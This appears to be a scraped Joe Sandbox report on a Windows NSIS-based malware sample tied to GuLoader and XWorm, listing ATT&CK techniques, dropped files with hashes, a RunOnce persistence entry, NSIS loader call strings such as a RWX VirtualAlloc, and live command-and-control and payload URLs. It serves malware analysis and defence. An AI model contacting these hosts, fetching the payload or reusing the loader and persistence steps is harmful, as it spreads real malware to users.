        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Windows Management Instrumentation
        1
        Registry Run Keys / Startup Folder
        1
        Access Token Manipulation
        11
        Masquerading
        OS Credential Dumping221
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault Accounts1
        Native API
        1
        DLL Side-Loading
        11
        Process Injection
        1
        Disable or Modify Tools
        LSASS Memory31
        Virtualization/Sandbox Evasion
        Remote Desktop Protocol1
        Clipboard Data
        1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Registry Run Keys / Startup Folder
        31
        Virtualization/Sandbox Evasion
        Security Account Manager1
        Application Window Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading
        1
        Access Token Manipulation
        NTDS2
        File and Directory Discovery
        Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Process Injection
        LSA Secrets215
        System Information Discovery
        SSHKeylogging23
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Deobfuscate/Decode Files or Information
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        sgJV11UlDP.exe8%ReversingLabs
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif8%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dll0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
        http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        apslline.com
        103.53.40.62
        truefalse
          unknown
          xwor3july.duckdns.org
          12.221.146.138
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://apslline.com/LfGiMdRCMSvlQHkIpf170.binfalse
              unknown
              xwor3july.duckdns.orgtrue
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErrorsgJV11UlDP.exe, Busaos.pif.3.drfalse
                • URL Reputation: safe
                unknown
                http://nsis.sf.net/NSIS_ErrorErrorsgJV11UlDP.exe, Busaos.pif.3.drfalse
                • URL Reputation: safe
                unknown
                https://apslline.com/sgJV11UlDP.exe, 00000003.00000002.4080016403.0000000003148000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesgJV11UlDP.exe, 00000003.00000002.4104301125.0000000033921000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://apslline.com/LfGiMdRCMSvlQHkIpf170.bin4sgJV11UlDP.exe, 00000003.00000002.4080016403.0000000003148000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://apslline.com/LfGiMdRCMSvlQHkIpf170.binosgJV11UlDP.exe, 00000003.00000002.4080016403.0000000003148000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      103.53.40.62
                      apslline.comIndia
                      394695PUBLIC-DOMAIN-REGISTRYUSfalse
                      12.221.146.138
                      xwor3july.duckdns.orgUnited States
                      7018ATT-INTERNET4UStrue
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1534200
                      Start date and time:2024-10-15 17:42:57 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 12s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:sgJV11UlDP.exe
                      renamed because original name is a hash value
                      Original Sample Name:f3a3332b13baa50c41644b86efdf0fe4.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@3/26@12/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 92%
                      • Number of executed functions: 62
                      • Number of non-executed functions: 68
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: sgJV11UlDP.exe
                      TimeTypeDescription
                      11:44:42AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Afmystificeringen C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif
                      11:44:50AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Afmystificeringen C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pif
                      11:44:52API Interceptor6363352x Sleep call for process: sgJV11UlDP.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      103.53.40.62c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                        https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/45834840-3c14-4374-8f51-bbcadebab762?j=eyJ1IjoiNGRnZ2x2In0Get hashmaliciousHTMLPhisherBrowse
                          12.221.146.138c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                            17230659061f7212c82a51474b4881c633df451e130ec6cfbd94355d94352086b239967195549.dat-decoded.exeGet hashmaliciousPureLog StealerBrowse
                              17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                Paymentxx212093.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                  17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    Paymentxx212093.vbsGet hashmaliciousXWormBrowse
                                      hvnmaynew.exeGet hashmaliciousPureLog StealerBrowse
                                        hvnmaynew.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                          temp2.vbsGet hashmaliciousGuLoaderBrowse
                                            temp2.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              xwor3july.duckdns.orgc56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 12.221.146.138
                                              apslline.comc56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 103.53.40.62
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              ATT-INTERNET4USqs8Qil6FW0.exeGet hashmaliciousMetasploitBrowse
                                              • 172.31.127.134
                                              ip4.cmdGet hashmaliciousUnknownBrowse
                                              • 13.32.27.34
                                              c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 12.221.146.138
                                              http://youutbe.comGet hashmaliciousUnknownBrowse
                                              • 98.98.135.24
                                              https://escuelazoe.com.ar/.5#support@dotcloud.co.zaGet hashmaliciousHTMLPhisherBrowse
                                              • 13.32.27.129
                                              na.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 70.137.157.149
                                              na.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 13.165.162.220
                                              na.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 99.119.72.226
                                              na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 76.201.253.144
                                              na.elfGet hashmaliciousMirai, GafgytBrowse
                                              • 108.239.35.103
                                              PUBLIC-DOMAIN-REGISTRYUSc56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 103.53.40.62
                                              IMG0001.exeGet hashmaliciousAgentTeslaBrowse
                                              • 199.79.62.115
                                              Tax Invoice 103505.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 208.91.199.224
                                              Invoice.exeGet hashmaliciousAgentTeslaBrowse
                                              • 207.174.215.249
                                              PO.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.199.223
                                              Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                              • 208.91.198.143
                                              Documents.exeGet hashmaliciousAgentTeslaBrowse
                                              • 207.174.215.249
                                              https://access.kinu.or.kr:8443/link.n2s?url=https://form.jotform.com/242704649007052Get hashmaliciousPhisherBrowse
                                              • 208.91.199.114
                                              0kqoTVd5tK.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 119.18.54.39
                                              Scanned.pdf.pif.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 208.91.199.225
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              37f463bf4616ecd445d4a1937da06e19c56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                              • 103.53.40.62
                                              1-Ordine lavorazione esterna_pdf.vbsGet hashmaliciousGuLoaderBrowse
                                              • 103.53.40.62
                                              RFQ_56783295_12538_15.10.2024.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 103.53.40.62
                                              8861299486_INV_AWB_SOF_001_20241015_120755.vbsGet hashmaliciousGuLoaderBrowse
                                              • 103.53.40.62
                                              rComandaKOMARONTRADESRL435635Lukketid.batGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 103.53.40.62
                                              VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                              • 103.53.40.62
                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                              • 103.53.40.62
                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                              • 103.53.40.62
                                              steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                              • 103.53.40.62
                                              Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • 103.53.40.62
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\nsi1D9A.tmp\System.dllc56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                https://downloadsnew.garaninapps.com/SRTMiniServer_2.4.3_2024-02-26_INSTALL.exeGet hashmaliciousUnknownBrowse
                                                  5006_2.6.2.exeGet hashmaliciousUnknownBrowse
                                                    ocs-office.exeGet hashmaliciousUnknownBrowse
                                                      jU0hAXFL0k.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                        jU0hAXFL0k.exeGet hashmaliciousGuLoaderBrowse
                                                          #U4e5d#U6708#U58f0#U660e_40981677.xlsGet hashmaliciousGuLoaderBrowse
                                                            MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              MaMsKRmgXZ.exeGet hashmaliciousGuLoaderBrowse
                                                                Part_number_91875-11400_x_6.xlsGet hashmaliciousGuLoaderBrowse
                                                                  C:\Users\user\AppData\Local\Temp\Unsurveyable197\Busaos.pifc56D7_Receipt.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Category:dropped
                                                                    Size (bytes):5329718
                                                                    Entropy (8bit):7.979774478767476
                                                                    Encrypted:false
                                                                    SSDEEP:98304:EH//4Q0gBDcLaUgZLGTVCfjemnYMjgfRQ14dewsjdis7xGC4tIf/Yapu5koUe:0BD4aUgZLhj3gZj67xHRnFpu5kPe
                                                                    MD5:F3A3332B13BAA50C41644B86EFDF0FE4
                                                                    SHA1:F3B91AA55B8DCE62CB614E2A43D8E3973B1D47B6
                                                                    SHA-256:7FD5435121F2CB4320B1BC49400152EC3FECCE7F5CE0ACCE56F32C327126C970
                                                                    SHA-512:46808E4D79D0D1FBE2835456DAF31E0DE9E8F296B7863F38400EAA03FBF33BE450F92DF16F9B77AC5BB95AA33A97D484C1C678891C6E13B151F9CB7865C99BE7
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Joe Sandbox View:
                                                                    • Filename: c56D7_Receipt.vbs, Detection: malicious, Browse
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@........./.........r.../..............+......Rich...........PE..L......].................b....9.....H2............@...........................?...........@.................................0........`;.x............................................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...X.9..........z..............@....ndata... ...@:..........................rsrc...x....`;......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.483822629187616
                                                                    Encrypted:false
                                                                    SSDEEP:3:sEMBQEJkJVEj9id7EVUxQoXUn:uVmxvUn
                                                                    MD5:57FCC15EFB7333330E4CE43A197A823F
                                                                    SHA1:66BD1A4B000CF26B6E568CACDDA0E9F88C28F899
                                                                    SHA-256:30A71BBB38285BAEA3079D8868EE88C97C988727E3A139528FC153291328E394
                                                                    SHA-512:C1B9FDA9BA474F6FF65A37656C8CDDF072556A2EEF653DD043FE1E3AE89E1AE8311AA0433BBB5C989912EDBB21C85ED70F6866AB6957C83B88A085CCC4AE0316
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:kernel32::VirtualAlloc(i 0,i 23674880, i 0x3000, i 0x40)p.r1
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11776
                                                                    Entropy (8bit):5.854901984552606
                                                                    Encrypted:false
                                                                    SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                                    MD5:0063D48AFE5A0CDC02833145667B6641
                                                                    SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                                    SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                                    SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: c56D7_Receipt.vbs, Detection: malicious, Browse
                                                                    • Filename: , Detection: malicious, Browse
                                                                    • Filename: 5006_2.6.2.exe, Detection: malicious, Browse
                                                                    • Filename: ocs-office.exe, Detection: malicious, Browse
                                                                    • Filename: jU0hAXFL0k.exe, Detection: malicious, Browse
                                                                    • Filename: jU0hAXFL0k.exe, Detection: malicious, Browse
                                                                    • Filename: #U4e5d#U6708#U58f0#U660e_40981677.xls, Detection: malicious, Browse
                                                                    • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                                    • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                                    • Filename: Part_number_91875-11400_x_6.xls, Detection: malicious, Browse
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):56
                                                                    Entropy (8bit):4.286618146008852
                                                                    Encrypted:false
                                                                    SSDEEP:3:sAAEVvjsvdxE584n:fL9P
                                                                    MD5:2B322A53D90A2271FFF01BF0834A5FD9
                                                                    SHA1:DA3FB0F558C75C2FE3D0BD7C9C19705B72B57D3D
                                                                    SHA-256:C30C98B13BB40861BA5B1CD08CC1018D11C0E9B0C95716A8A0D7B8E0B863CEB9
                                                                    SHA-512:F0B775FEF5150A7824FE25320F0FB1C383BAFC1AF7AC79E2E3CC7E791D4F296C44755A5A56BD4DFEEF8D0C9F913B5F9CF5B4AD8487FDC1163DF82050EE64521B
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:kernel32::ReadFile(i r5, i r1, i 23674880,*i 0, i 0)i.r3
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):74
                                                                    Entropy (8bit):3.9637832956585757
                                                                    Encrypted:false
                                                                    SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                    MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                    SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                    SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                    SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                    Malicious:false
                                                                    Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):30
                                                                    Entropy (8bit):4.256564762130954
                                                                    Encrypted:false
                                                                    SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                                                    MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                                                    SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                                                    SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                                                    SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                                                    Malicious:false
                                                                    Preview:user32::EnumWindows(i r1 ,i 0)
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):52
                                                                    Entropy (8bit):4.0914493934217315
                                                                    Encrypted:false
                                                                    SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                    MD5:5D04A35D3950677049C7A0CF17E37125
                                                                    SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                    SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                    SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                    Malicious:false
                                                                    Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):44084
                                                                    Entropy (8bit):1.251987965137089
                                                                    Encrypted:false
                                                                    SSDEEP:384:H5J4r26NPfk3R0omoj53ZOmVFPACwEygLw6:b4igfY3wEy9
                                                                    MD5:8E1ECD1CAD1A69BA46F3589D3EE05FCD
                                                                    SHA1:511FE3218234DFD061C85834E32694D500A2D8CA
                                                                    SHA-256:027B544D8E1F0A9CC480B455943CDB8B7F2E1E6FE64FA4E84C5FB22F58E75534
                                                                    SHA-512:D4E8D21B29799A2FD6AA6B254B0E5F1E212F2CEFF6244D3AE1641F460A88FD39EC32AB04E3787BE6C313ABC85B76A2ECC90FA697C58B9899AEE59B16452D98F7
                                                                    Malicious:false
                                                                    Preview:....................................................................................................................g.....................t...................)...}..............................................................................................................O.f...............................r................................S...U................:........................................2................................................................7........................."....c.........-..........................>.........................j...........h...............................G2......P.......................qd.......................................................................................................................................\........................7.....................O..T;...LK.......j.........................................................Y..........................J...........................................................................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):495473
                                                                    Entropy (8bit):1.252683728528738
                                                                    Encrypted:false
                                                                    SSDEEP:1536:29Atz1Dww/YItq3ys1yNe3uRHiOnU2E74SEH:29AtzV/2yFauRHcoH
                                                                    MD5:EF47BA5BA9823E8C3469035CF70773D2
                                                                    SHA1:21D1961813BA8BABF395C3AFE324487EE355578F
                                                                    SHA-256:895776946CC4E8956593C9B8CBA36B3D0523F921C419F2A68C58C82FC5BA8C8B
                                                                    SHA-512:E78EA0CA2E615EF745FDE2A8D1FE07F7216E253057805091E0E91A4E7CD780BA8C5E33F2DFA6283104D7A2EED606DEAAE1E82345135CBA914ECAB32B9C5CCF27
                                                                    Malicious:false
                                                                    Preview:............................................................................................,................................,I..............*..................{.........................................q..............................A.........................................(......X....%..............................................................................................d.B..............................[..............................#.................p..............c............................;.............h.......................7...................................1.....I..................................................a....................................................j...................................................................................................a.......................V.................................{-..........................................[....................................n..................................................|.................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8601
                                                                    Entropy (8bit):1.1545164397538636
                                                                    Encrypted:false
                                                                    SSDEEP:48:zEuB7ok0LmcrzKI9XjvjvGWt/nSz4DP6FIB/IoZt/V:4uBsk0ac1jvqcD6QhV
                                                                    MD5:F4A704DD6599AA965F753CF4AFF41544
                                                                    SHA1:27F6166A11011BF9340B9477D469A5E39B67CF5B
                                                                    SHA-256:689F1C7B21D424488E2F82F5E1CF663D41BE2B8402853953B723F457D91F5C2F
                                                                    SHA-512:F2EC79C777CA0349BA727C2292026C83C3CCB0F84C807431A859DB7196248C95E17DFE13EA081F3020BF12F14001D58824F6EE0AEE770DED6BEB7D94E082C082
                                                                    Malicious:false
                                                                    Preview:...................8..............................$.....................................................>....................'.......................................Y.....................................B........C....X.......................................:.........................................................V.............................................H.....b..............S...........................................................w..........................f..........................................................................................G..............................................P@...................fj........................G..]................................................0......... ..................................................................................................H.......................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):225561
                                                                    Entropy (8bit):1.2509602063831964
                                                                    Encrypted:false
                                                                    SSDEEP:768:vodpoBR9G/El4UjO+zHLgOWJmrzfhDM2QY2RSbSL8nMzcUqbFuPYVTmTy2MekyEc:W2pzkDkzfhAtNbKANtv4U
                                                                    MD5:6865DE99FA19A6862DF5C404DE274F27
                                                                    SHA1:4EFBD7E416C513C7B2516052EFD42DB502306C35
                                                                    SHA-256:3921ED66814A1199A488E44FDD72C224D4AD9505F3EA9D111E046704B37483B3
                                                                    SHA-512:F46BDCB2A29BA7ECD780C181230E573D3D0D7C55BFC06CAD641FA764F90068AFB6A3F7FC14AF1BA725A168EF212CBA93F6530FE7C0D0EE0C78B5A5B729F41B3D
                                                                    Malicious:false
                                                                    Preview:......................................................."...............+...........).....................................(.....................................................................W.................................. M...............................a.1................r.......................................................................................:..B.............._......U................./........................7.......................................y......................................S...)........................................................n..........(..........x...e......>..............................:........8..................................q.........................................................z..............Y..i............................................2.........f...............................................................................T........................................................v...........5....................................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):155008
                                                                    Entropy (8bit):4.592026808124209
                                                                    Encrypted:false
                                                                    SSDEEP:1536:GvWaiD1khghhBlYPnsfL3qy0IPazqk8R4JIZoyvUv8fUc/SzqJH3G69/BKhoS64z:GcD1kEVqy0IPaQ7ZhjNaIH37/f8
                                                                    MD5:8F6AC9BACA244A9FE17E755F881C8FC5
                                                                    SHA1:8C1B08CE1996A597904283F8BE8FE677ABB592D9
                                                                    SHA-256:200AD6E107078B2C0ED3B29AA5CE0F7E4AE26E80A8AA25AEA2BB487B2F20AE66
                                                                    SHA-512:78B5924ECC3CB0648B5511638AF98EB1E00D8A150CA84F574CAC9DE04F7BD50D95E2A33C981F1F0467EB898D6D9C34978264B178F57B016A106CEC8F82643922
                                                                    Malicious:false
                                                                    Preview:................3............................&&&&.g......................,......)............ZZ.........{{......I.................!!.k.?.....&&.00............PPPP.p..........7.......\...........<<<.9..............``..............%.....................OO........m.6.P........e...............7777.......................?....P..............,........c..l.....V.........Y................GGG.....}......mmm......I..................H..hh..7...7.g.........mmmmmmmm...............II...........o..33.........""".......................CC..........LLL......q......G......>>................................X......\\..cc........ss..................O....O.QQQQ.R...EE........P..........b..V.........................J..............:...................OO...........a...........hh...<<<..................ggg..HHH.........**..........ww....UU..ooo.........99..........v......II..d....u...nn................c..www..OO..... ........................................77.l.......................g.d........K...(..............
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):56731
                                                                    Entropy (8bit):1.2442160585209034
                                                                    Encrypted:false
                                                                    SSDEEP:384:6tYghFWWJicOfl9hdYo9Gvdjh1rjjKlsru8a/3FPzYnaIgapZvHcFe/0C2vqW8IP:NyJicyhlodh1jKlP/3FcRseqD
                                                                    MD5:BCA0C962216D9B512E1FEE1F72EBA35B
                                                                    SHA1:FF228246A15FA291474DF13F96C51A6BBE03FDBE
                                                                    SHA-256:9207608EB008266B5F27EFAF786A1B6D2C4B611F484F62B5FF31D764C0225923
                                                                    SHA-512:848BEBCE00D0968884AC1A54BC220DA34FADAA072F403434741DFC3F9843EB3848864184F1F38DAEB013CE0BFEE1BDC09679E80F2EAB9C8CC67ABA3816E0548A
                                                                    Malicious:false
                                                                    Preview:6.~........................................................E...............................x...............................................-...................}..............................O....k..............................................................X..................................).......Y...7.....................W......................................c...................................................................\....................0....................................4............~.........................................................................................Z...............................................W..............................p................I....R.............................9........................%............................................................."\.....................n......8................................C...............................................................b..............u..........................W.................
                                                                    Process:C:\Users\user\Desktop\sgJV11UlDP.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):495473
                                                                    Entropy (8bit):1.252683728528738
                                                                    Encrypted:false
                                                                    SSDEEP:1536:29Atz1Dww/YItq3ys1yNe3uRHiOnU2E74SEH:29AtzV/2yFauRHcoH
                                                                    MD5:EF47BA5BA9823E8C3469035CF70773D2
                                                                    SHA1:21D1961813BA8BABF395C3AFE324487EE355578F
                                                                    SHA-256:895776946CC4E8956593C9B8CBA36B3D0523F921C419F2A68C58C82FC5BA8C8B
                                                                    SHA-512:E78EA0CA2E615EF745FDE2A8D1FE07F7216E253057805091E0E91A4E7CD780BA8C5E33F2DFA6283104D7A2EED606DEAAE1E82345135CBA914ECAB32B9C5CCF27
